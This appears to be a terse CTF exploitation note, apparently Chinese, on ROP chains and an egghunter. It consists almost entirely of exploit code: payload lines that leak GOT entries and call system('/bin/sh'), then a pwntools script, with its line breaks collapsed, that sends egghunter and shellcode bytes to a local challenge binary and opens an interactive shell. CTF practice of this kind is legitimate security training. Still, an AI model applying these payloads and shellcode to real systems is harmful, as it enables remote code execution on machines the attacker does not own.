两种rop and egghunter

payload = 'A' * 24 + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(evil_addr)

 payload = "http://%\0A" + 'A'*(156-8) + system_addr + 'AAAA'+ binsh_addr

puts_plt + 'A'*4 + puts_got

payload = 'A' * 24 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)

sh_libc = list(libc.search('/bin/sh\x00'))

from pwn import *#initdebug = 0if debug:    io = process('./egg')else:    io = remote('127.0.0.1',2334)context.log_level = 'debug'if debug:    gdb.attach(pidof('egg')[-1],open('zp'))#----------------------------------------------------------------shellcode = '\x90\x50\x90\x50'+"\x90\x90\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\x90\x90"jmp_esp = 0x0804885fio.recvuntil('Your party seat is')chunk_addr = int(io.recvuntil('\n'),16)print 'chunk_addr = '+ hex(chunk_addr)io.recvuntil('trick?')io.sendline('treat')io.recvuntil('located in ')stack_addr = int(io.recvuntil('\n'),16)print 'stack_addr = '+ hex(stack_addr)io.recvuntil('your name?')egg_hunter = "\xb8" + p32(chunk_addr) + "\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75\xfb\xff\xe0\x01"payload = egg_hunter + 'A'*(20-len(egg_hunter)) + p32(stack_addr)io.sendline(payload)io.recvuntil('sweets here.')io.sendline(shellcode)io.interactive()```